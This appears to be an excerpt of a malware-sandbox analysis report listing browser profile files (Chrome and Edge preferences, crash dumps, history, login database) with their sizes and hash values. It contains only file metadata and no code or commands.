f1cf4e14bd3f5a92f65e4d344b028f34

SHA1
365e228d99bed038f8560cc4eadfcd9b4efbc425

SHA256
150e7725e7f52b45f53b317d1d6a9939230a158b6ab46a4fe7f11fd4ec783d54

SHA512
0e15bfaaa1773274de26adf5b8d6a5263391ee769edc884e8762491055570ccc9f7046148c758ab24ac0e42e18075e57b6c28be2c6ff17cff21ef86ff78cfd7f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Preferences

Filesize
9KB

MD5
479e72338d098f181c34d462fb4a8047

SHA1
092059dc94f5206403b396a4e8fd3a2cba3037aa

SHA256
9a069b40e6e8d5851b4dd9a80d3599e76afaeb71377444fa774ddc9422c69c2b

SHA512
1a2f4f46a138ea29565c8a0f19a99532ace773cc39ada0b222ec3c45d979f56edaa8a76b7ffe871d4c1fadef5d272ed87e7769af5ce1492f0420eab500e702d4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Preferences

Filesize
9KB

MD5
aa0f70827f24a78acb7933ac67410ed3

SHA1
f4daa77348481a53f8216e1e7386000c27715638

SHA256
ea4e4956cf1d8294b7d2d6e63b7fbef6297515c58fecc3374e5c87c451f23bea

SHA512
2d43953be73efc43cb1a6c216788d26d50b56693a25bf4087f9e55e17a2a166d079de01abd8100174ada51f2f20b89d52982afb964ce15bdcfa80b6f679ac880

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Preferences

Filesize
9KB

MD5
c9f1692b7d5ed826a8e26864114b2298

SHA1
9695d181e14719ff41f237e1c8b18ee62734f701

SHA256
a9065407b96543cd1748b107a86202734595764311653f5d3384339897bbb475

SHA512
1d07e9834a2278c4eaecdc75d87f2e249ec504e2337cee8e0f601dfbd6566bbb933e1a3eddb005d0ce60fbc62a81ddb500abb5920907cd022a6a0954e786e2da

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Preferences

Filesize
9KB

MD5
f70a81add2aca4e48b76fb5c3237787e

SHA1
1dcdbc0d44c46799736872bb59b88dcb00c24170

SHA256
d055dc441871f0b4f42cfed004ae4dcb298916c2f015f0ff19844817571e1d4a

SHA512
525d71a40936c366aedc336b0ee79a2f586a39c5513574375232d5c53fe56eb477e2f7cc89586978db620d5cef04c434db42ccee9367a668e77928079bde7558

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Local State

Filesize
127KB

MD5
bcbdea40f0755a403db33fe0cfbcb66c

SHA1
7c05766508eacfd46f43ec687d6cbc757e8c4e45

SHA256
be21d770eeb3c9f9e39b7ee85e62292622e87534e55e59716091289a445d76a2

SHA512
7b094aa1142da60db4db49e9991e99cb98dcf48af9aedbb58cca7cebe9f624a3168ed2ac8b3f00e42502405f8e0dde6d1f602bded5a63fa8f887dd7fe9ae208a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Local State

Filesize
127KB

MD5
b5f25da049b8f0515106becf16502def

SHA1
3f86507006818e850947b425ec28f380d69b75f3

SHA256
5da1228871907b43e8a30b332e5a8dc0422101efb9dfbb1c48e9b600136c24a0

SHA512
74abda58f33eb6dcf3a49d2d62357f86247c6444f3e17a3c438701f90f7f97467ef8b4fb4835f8d9fe5cb4bd724baed81559239323259708831b8885e00fbd6a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
6fdf445bceabea263b126e898235ece2

SHA1
9abc6ada502bb355def1346e65c1fe35943171ef

SHA256
a9dbc4c1ca3f6a4ad34af0cd8a3317fdaada9126d3a8ace180bc82baaca983af

SHA512
303f77c2571c0efb0d60c54e24297b509002d1de124989407833c8f3a07a883bf27aff040a1d8cb2f878a1ab1c7f6e68bef683299d293dacf7f5a67c63990800

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
120B

MD5
33fab79dd2709dbbbd9683738f8d02ab

SHA1
87c97d90d5f303cfb1b0647d1e3862eac6dc78c7

SHA256
ce977bdb00f615ca2f433f1e9c1ff59bbc1c94f77aaab5617197320e001f9ea9

SHA512
39dbb8330ee830650b2b0249c5e76d2b9c51d5864a1dc6842d0fca18f10580e729adea7a7a314879e5484633f1b16036a895d2b51d4e2ef9c51231e82e17f93b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\_locales\en_CA\messages.json

Filesize
851B

MD5
07ffbe5f24ca348723ff8c6c488abfb8

SHA1
6dc2851e39b2ee38f88cf5c35a90171dbea5b690

SHA256
6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

SHA512
7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\dasherSettingSchema.json

Filesize
854B

MD5
4ec1df2da46182103d2ffc3b92d20ca5

SHA1
fb9d1ba3710cf31a87165317c6edc110e98994ce

SHA256
6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

SHA512
939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
3KB

MD5
33185b3836e9445ea68377b92cb5e313

SHA1
475eada10efc1b0a9878dfcc2b6df73c7b443684

SHA256
485c3ff441c60df1f7cd9cf9fd62e883465c3d3b3ae91f08880e5061a2fcdd96

SHA512
7718f7c530018aa09b20568424718f202e88cef528136c8a29c93e95ac8e674d17e8e18ad8926291ba2751c173fcec9bed87a1e9d29f47a0e9c2681214a5ae67

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
20795cde0439b94df4710444504f8f65

SHA1
0ec52645ba2614459d92f91b647481dab5fe5230

SHA256
876d5da14376059cd8ab6969e9b1dc688dda02a1e22c815935490dfe21bab05a

SHA512
e3230613736995519a3dbd63f3af42c3ce5b0e2e703da50fd9206b26536bb07551100547505e31bb790d49126b679bef28538d820eb79be58c585565c4b5fefb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
cc91bb857c511c7e4be3c1829680e0be

SHA1
201a5e54362789532d65ecbcb99872da342273da

SHA256
c6bdb1f7bf0cfc12fac02c44181d6e32ab1cb7dfeaa264fab0d3ab937e97115c

SHA512
d2e95548950f8c7cea1aa4397ebc6be37e9107ee23eb86fc6d5cf9ac0376601486859705119281056ebb8925cd458525c8fc46d6561a2005d3af4a7e68596fea

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
55ba8686c14154c87354f7f9e48b9e1b

SHA1
4f3dd9fa2ee4738ff81f2d6280ea746a3a6fc278

SHA256
173c3186371a6c6ed7d6d9219c9ea4b28acd358fcee0a3edf0aaba54e402f08d

SHA512
2ce4879f33b84869d02712283f470b1534cf83ffd056a70395236d3cb66de21cfc2687d32f4fd1457ae01dc00c0ab228143f95f25fa1e43f640258db153a5f8d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
7335358f9e34850a7cee783e810f3965

SHA1
662d4359e6c2d8ca67c0800d21c5d797ce63beb3

SHA256
8fd4167f54a2bf5d7da7bc5577c281769a81aa9aa53861f1f2d3dae3f4e1d0ba

SHA512
17808418ce52abfe3d5ed6b4b08031c206b3f83c42fb6b07a3daa26a8c6a29ecdcd6ba53d5e792bc3b1e3c07c2140002552328e256a485330253ce2f27a176ce

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
3f22acb4ee45211b9204e5d1829ac454

SHA1
850a240998b75afbe2b44d8c775a262474185dec

SHA256
65615acf3cf5172a90df181917dac4b31588a446b0f287eb800268ac15ca8f93

SHA512
453c5935008be870f795f9758716c3468fd1d7753e7c29069986511ce58fd464ec6fd7546f897fc0a0b164e7975d787d68afcf13a2435acd203a7e94f005daba

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
293bfe3bd84b0e8938445620d71e6c2d

SHA1
32f68506605104be4bf27e3d8cef6568e57209a3

SHA256
7bdda8e90c2b3bb2c5d1f0b638812b012be88caedbf09f5ab8abb0709dcf7d4f

SHA512
1f3f0dcda708f2ba2d89547f9c8b5d24ddb8f125a58c59357bc87f7e76e000e3e2bdc79bd8fd6b461341593a7917e09705c3db8596768eda9dd43504e33e51cc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
151c9a8c2a9b3907f2a5d204bb68fe30

SHA1
a4175fe5a37111f8f211a5b89dd653699eae25a4

SHA256
7904726512f8a2ddc8544750548a4ee1b3f49a72c4faa35fc4fde1e272a0fb29

SHA512
3b409cbd965436fbe65f3b6ff99da582f17f87ddb52a82811822901e253f21f5b5139e4bd31462217eefb9e06799bd15e6eaa8ce4e4fbadc75636f727ebb9e59

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
13KB

MD5
aa4bb99a33bd0ec99c33a3bac7a84fe5

SHA1
d816fb580a306d54e0a88515b62cd9e05184a9fe

SHA256
3aa247f833b7517cc9a0ab7ce0e729c429082e47b599661f41c8463e7615de2e

SHA512
faf2a5ee004f98be6f254f7ffab70877013c3d8e193201fe532f9e70b0a28405e813d887bda86cf1dbe3ca3d0a9c8bb267cb42498b8efae9a8fefa8d4a114727

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
1d54a1227ae37f82be34bda6aa316586

SHA1
82dfe6674f1d57da2c10a0ccb6fe8bff9399c1c8

SHA256
8b9d582b192cdc26982d8085d351e3525e6f5a45a0d391c92b681902a726b3da

SHA512
508929364cd85fa1479b99bf3dcf9bfef2478457cdec2e2a16d3bcf1f6b1217eba835b839d0cf577a15ea04491b74bd42e66dd8c37e42f9e586669b8e3e660ed

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
246KB

MD5
4aefa96da24e23eadb79c4b74a5673c5

SHA1
382c930434e806e29024a087b8dbeadba0257e32

SHA256
c84467f1885c7b4194ab7e24e50210f7908e24a98a6fc6f845e034561814f0d2

SHA512
ef5a4925a8e8e270d2f94d70b2689014b7da38c38ac05d7639e2c2fd39c9ef8343c0e360beca75d4e54b519ad809280d056cdcc0851bc2bab6d3db6fbef531f5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
246KB

MD5
46936cc7784bdbce8e9bb07dda8c33c6

SHA1
e58ad27d472908e43662ecb560925665bb15bfc8

SHA256
48292255660edaa3fd853dca41f164c1c5b690bd7f2321452ee0a2c5575ef536

SHA512
bc4d2c909548602b7b226f1f8a8d63be3f8023449f3f9b29806b53deec284c67143daab0a31822224ad8e785497f33021dd9d89e24744762db5c54c3a2232086

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\CrashpadMetrics-active.pma

Filesize
16KB

MD5
f9abba11224c1ad45bcdaa95e882842b

SHA1
1c8bfbcb53d611f72ccc9b80c04eb4a1e45a2400

SHA256
bb7428477de5d502b5414b3123ae7bcd5aeb61d37da8492318a9a6b45242884b

SHA512
90a9a486a505a44e012d49104f3d87954f3c729a800939cc9b127f283eafd841db8c019ba30b96ab2ebed0ce4226af2147417b41242de2dc2d600af119345926

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\metadata

Filesize
150B

MD5
113e764bdc04b1005b60a44451d1ea49

SHA1
4f1e8c87ad0b87f137f851df0e408b2407dafd2a

SHA256
ad7e8241a20cbe42d1f5588bfee7b69cdec1e68f9ab97db0e13ec9383f7dc9ea

SHA512
0806f279b1a8f606f48a87dd7f049c8edfb2e07f19cfef3f553f2ef87defa0d882cbce1ef0684d00089814ff520c33808802cbf052cdd97d47daed482a1c85ba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\metadata

Filesize
418B

MD5
4be5055eae1ad3b78b19e78fd284d5a0

SHA1
9dd582a795317909f350747718ec493d1b238c45

SHA256
64c6347cc62c8b02e1f336b8b3312644e7c59d3dd178bf25386ddf063d4ba7ef

SHA512
ee8c9de7c647e9f48f20b49cb1cbd8383d293dec92035a87a6440c88d499b90b55dcb7fac9394451b577757dd20acae37d6d940a67441aa122b2673ba28c5468

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\metadata

Filesize
686B

MD5
0880c968d9d8a8f9c00a7bcda47babe9

SHA1
b817009c89087bb3e272ca3cad5a6a7f138924d7

SHA256
bc75a054d84f084546d5e7517f9a6f72eae8dc5e0f9187a0d3c48a4aa31ad5de

SHA512
a01841da2b6f15d994775c54e62b2e153e1a516731990cc1f6e57b7e99e9fd76421e7c8e8c903dd75d7fbdc7d1cdc1e6b3db5fcfd650d277659fc39263bd6ed7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\56c6e358-4f6a-4447-b952-28b943a5e7af.dmp

Filesize
842KB

MD5
ef17196e1c88441251ea92c781fd3c4c

SHA1
b37a3b0708a0504561851c6cbc961be83e3fe47f

SHA256
d6d7fa105d7b1a23a1345a57dec890c81a6073366055a65cf7595a563d376d2f

SHA512
1a80cb58e454f4a3e7df4b9423d27e58b29832b4683cfe178c42bcf7477bbd87db71eb37c49a05ec07459869f128c14b1104e33749b26fc57a5bcaa54598889b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\a8327d09-2d1f-4ba3-b83e-9f780afed00a.dmp

Filesize
842KB

MD5
c21d6702cf4e453ef1106ecea76fb812

SHA1
ae43241d5a8f24085e12faffc422220a1a77200c

SHA256
68ab32d120394f60ecf4bbfa5f11b47a303710df76ece26a37faf91ccd8299f2

SHA512
db5d16b35b5c36667b2f77ef5400ed5eff56576da710fe6025518a28dfda7117239adac7704da07107ea4291b28c90037024e0b3c891418b4a41f2e0fe61607f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\a94d154f-3c56-4a7f-92b2-8cb71bedcbac.dmp

Filesize
842KB

MD5
1e1ca3efb214c11ee876b2d28b64a1cc

SHA1
84bf15c1272ccfffad95a04d2eb427f02474b75d

SHA256
501d9c48dbc69fdb3d3c2a99ef1a670ed220a1534af792772c38666d94760baf

SHA512
43f142fec5ebabcd71da852965558e17a2f001f39881bce6a040cdcdb8440c9fd9f8b72c1372357380cdb3b50c599b3f01ccd0be8a2fe25319d71c6495480fa7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\b7f22579-aecc-454c-b35b-a5328f4bd35a.dmp

Filesize
842KB

MD5
5cf16bfbcd2bb43ee965d020134292bc

SHA1
79222106dd9ac4e024dfc762f0f4bf335c454f57

SHA256
fc5330749cbc307936e8035320ff5a146fe977b09ba82dafba3c9f14fc5eda34

SHA512
f9fe5c52563012875cd548433c7bbb627c29a6157f8d184c4e45976eb9f8ee33c6601ee7360d227b913a6efa8315991b39e060ad0762b7aa9e880e04bc13c899

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\eb991239-9c06-4af7-bcae-dbdcbf56850a.dmp

Filesize
838KB

MD5
76541352adf3eae9b40f111b091a8bf5

SHA1
9cedbc273082da2efec105d890b6347e7b890c67

SHA256
51a2fbd9e002fad7e224a31667d1fe10b862c0aaa7d323f98fa608e01649b7dc

SHA512
4e53ce11b5f475ecf7070df68b1c7706abdd6692c5fac34c3b2f495f387f59cdbd2cc75499c7a36d06050969be81cac108750ef88f8cad374dff59f9f1b53a36

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\f8eae843-aa55-4f31-a03e-8e0a89c453d0.dmp

Filesize
842KB

MD5
724ceb68d1bab6981b625a355823c7eb

SHA1
75736e2e5b30de5681bd8041b23e40ab1869fc03

SHA256
4bcbe19afa409404e078dc9058deea8d5459e8918e73d91db7051679d7f95536

SHA512
25b8657a415dedb255ac153c0ff25ef6034e88b94aadeae51b8e2d1e79c2e437a07badfe155439108f0964d31eb2d0c4a21698199f981a6e5e0de772f7c453ad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\ff78e22e-5594-4a87-99d2-0df67be37db4.dmp

Filesize
6.2MB

MD5
e1f41d04b37cc4e14f1a2ed48664580d

SHA1
b2d8596ea3f775d22fba369ca6b31938c3822e14

SHA256
25566defb147f42c3630efbabd14428432739f95053e5939635cf1af023f70fd

SHA512
b4f987da1481aae976ee9712f48b072cea4eefbd4cecd4c9b5ddcd8f59819624cfecee94322ee3771f949c4a6a1190b61630c761f7270278146aa2fa4077d9de

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat

Filesize
152B

MD5
19437e867c020bc4e0243a742fa4a70d

SHA1
62fa344763296b06c2def6d1be593c82162e1d89

SHA256
06e21ec5df359e2a40952b2acd6976da38e9719a4026c56cccb9796f36568d8c

SHA512
0534c198e2e628b9af4beb221ecd549cef3fa8756d968fd4d3a148f013af7176daf083f8875bfaba5baff73e922deef7a7d3bb3f9cb9e2cdc8e5d56038ceb1ad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat

Filesize
152B

MD5
e314b505a6501aa8730352e3ea2f9d01

SHA1
c00b63ca22df59d1dbd5187e2d3a618e13263b9b

SHA256
e8d73130147b0753d0ea1f8f6935c332df2b3874cb416925e153550acf57ff61

SHA512
340385d0b76785c174ffa3c60c75d14973f6cf6dc52f1f81119f6de6e58c39e924c2d765a6eae64c0c39b583055ef035c4e8436d8b52ac31db561da2864090ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat

Filesize
152B

MD5
da20c5e5ead7e8a20af01911735fa505

SHA1
7089ee350620272cdacb14725e8de6b8d465f30c

SHA256
04b9e7bfcb3bf613b187e286714a1e7d2b97e08c84f19477d859ef863fbc17d2

SHA512
e8b29aeb8ac445f11a78a423730aa6b90450e89b35795a30eb90c98e01ca5260e4b5c3d980861a09b36a933c4d39c6de9699cd97fe2a9728950a540dae295fc3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat

Filesize
152B

MD5
d278841ab806d351c4baec2c01d1ca44

SHA1
3f4b27a90a22de042eec9881ffd2cf760f2d8059

SHA256
dda15bf8d624ebc4ad79c489e3674778480ce3b973eed0bf92381229b97486d6

SHA512
f684f5e4a37cf4d23267fbcaf7f7e1d4a5fa329987e7bbf7b613042f87e6c2ee356573b3beea70633d8e17f7b077746ad1499fcc975ad543c533135ee0dd25f4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat

Filesize
152B

MD5
8b08c0b5e1063941be59ed8d1a8d9014

SHA1
5a5e8fa163f153d31eea2a60369b003b0bd1c06b

SHA256
e4d9de02270acccce765437701b0f468c465a53ac428f718c7be8d29be0f9095

SHA512
b9c5806e18d8268843e53e9615e1c441356664a40ac8a16ea86dc7e25fd3b15918115e587963a910506746fe318f08f1633d914af11f3f1de8eb936b23507d88

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat

Filesize
152B

MD5
f09c5037ff47e75546f2997642cac037

SHA1
63d599921be61b598ef4605a837bb8422222bef2

SHA256
ba61197fff5ed487084790b869045ab41830bdf6db815503e8e064dd4e4df662

SHA512
280bff6eac4b2b4fe515696223f61531f6b507c4c863ad9eef5ab0b1d65d264eba74fb7c9314b6920922142b8ab7605792211fca11a9a9ef0fc2ae995bf4f473

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat

Filesize
152B

MD5
010f6dd77f14afcb78185650052a120d

SHA1
76139f0141fa930b6460f3ca6f00671b4627dc98

SHA256
80321891fd7f7c02dd4be4e5be09f8e57d49e076c750f8deb300be8f600de2d7

SHA512
6e6c9e348e948b946cfb97478698423e1272c4417bc8540e5daa64858e28be8fda5baf28538aee849f8bb409c17a51c60e48a3f1793e3a86cb27edeb32aa30a5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\throttle_store.dat

Filesize
20B

MD5
9e4e94633b73f4a7680240a0ffd6cd2c

SHA1
e68e02453ce22736169a56fdb59043d33668368f

SHA256
41c91a9c93d76295746a149dce7ebb3b9ee2cb551d84365fff108e59a61cc304

SHA512
193011a756b2368956c71a9a3ae8bc9537d99f52218f124b2e64545eeb5227861d372639052b74d0dd956cb33ca72a9107e069f1ef332b9645044849d14af337

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\2f456f73-84b0-4392-9bf2-e3f5769b8da7.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Code Cache\js\index

Filesize
24B

MD5
54cb446f628b2ea4a5bce5769910512e

SHA1
c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

SHA256
fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

SHA512
8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Code Cache\wasm\index-dir\the-real-index

Filesize
48B

MD5
23894956a4e66ef1a4fe4f67f063a172

SHA1
fa6f928412869877336c7ea06d6551c674f4e5e9

SHA256
e6750c3939360e7cd5ff5c3fe70cee3e67d60887ed757d46a0d99fa8c004ddec

SHA512
ffdd2d87d1eb6bc26b8fdb87144ecf3947598a8b6957cdc2f926677230fa82b047bc919fad36e4a7714391025dadb6a6dc1d5e07e7509936eb27f0c5e2e18bc4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Favicons

Filesize
20KB

MD5
71c47b8f44867d805fed290fb0a18f74

SHA1
a019b3329dd49f91ea94267f19de580c40c6ef67

SHA256
13daa8fe29d46fda8acd97cacd7baecc700b2a8763538709f8282941b629865c

SHA512
f35b779a06ef83496eb5adcd1ffeb20c144cc78ced2d923c5f87f9b9220b23c31a712b7518f691b58f65422a28b48ad569a43ee23936fa6445a9d8251a9658c7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\GPUCache\data_0

Filesize
8KB

MD5
cf89d16bb9107c631daabf0c0ee58efb

SHA1
3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b

SHA256
d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e

SHA512
8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\GPUCache\data_2

Filesize
8KB

MD5
0962291d6d367570bee5454721c17e11

SHA1
59d10a893ef321a706a9255176761366115bedcb

SHA256
ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7

SHA512
f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\GPUCache\data_3

Filesize
8KB

MD5
41876349cb12d6db992f1309f22df3f0

SHA1
5cf26b3420fc0302cd0a71e8d029739b8765be27

SHA256
e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c

SHA512
e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\GPUCache\index

Filesize
256KB

MD5
662c992690ecfc0fc488820b6fea6804

SHA1
3027c2a50e9c933ec26c4d358c85a830c8400968

SHA256
52b73ae5c99cf96e1858b17dd29c9cd3529ef4de5591c360343d843ed8ab5136

SHA512
c6edefc1b1314e5f49a3521621f23dc71712aed969b5d77be1f16c9fc81940e9c2b969c148c5e8e6d8c51fcacb9270cabde79cc5d6f24b747bd4180c4cb2188a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\History

Filesize
124KB

MD5
9618e15b04a4ddb39ed6c496575f6f95

SHA1
1c28f8750e5555776b3c80b187c5d15a443a7412

SHA256
a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab

SHA512
f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\History Provider Cache

Filesize
6B

MD5
a9851aa4c3c8af2d1bd8834201b2ba51

SHA1
fa95986f7ebfac4aab3b261d3ed0a21b142e91fc

SHA256
e708be5e34097c8b4b6ecb50ead7705843d0dc4b0779b95ef57073d80f36c191

SHA512
41a1b4d650ff55b164f3db02c8440f044c4ec31d8ddbbbf56195d4e27473c6b1379dfad3581e16429650e2364791f5c19aae723efc11986bb986ef262538b818

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Local Storage\leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Local Storage\leveldb\LOG

Filesize
334B

MD5
23bf4cc75b24687b9dfce0f410d10b96

SHA1
ecbfeb956e968a657c66376515a68c89f44392f8

SHA256
f5d6694adb93ffaf16591ff22264a2429a42f5a6cfd2b1d1f08660d95ebecf24

SHA512
48301ec23da0e9cfbe8577cc3638ce563a61284d285b978bfb021b4a420ff4496ced57971eacf82cf0f21660492a2d38433d8a129bfddc8c74b3cf214f61f46a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Local Storage\leveldb\LOG.old

Filesize
293B

MD5
b26a3c1619f9ede5bb70f924ec551425

SHA1
0117202166be786dbb3a0af4b13597ca1205959b

SHA256
657cd2fd1bd84e319ff7d03897c9c92436ea698dba78428524d113f56c151968

SHA512
5ae719035a63c6047258cd9e727e6980aa513183a3af8278a4a56027f7aaa9f3835a7775c961ff8820cb59d29ad1d3cee7c656940f267eac00fefcce9bf590c0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Login Data

Filesize
48KB

MD5
349e6eb110e34a08924d92f6b334801d

SHA1
bdfb289daff51890cc71697b6322aa4b35ec9169

SHA256
c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

SHA512
2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Preferences

Filesize
6KB

MD5
4bc034de9907952ca1f6ed9dcbe1c892

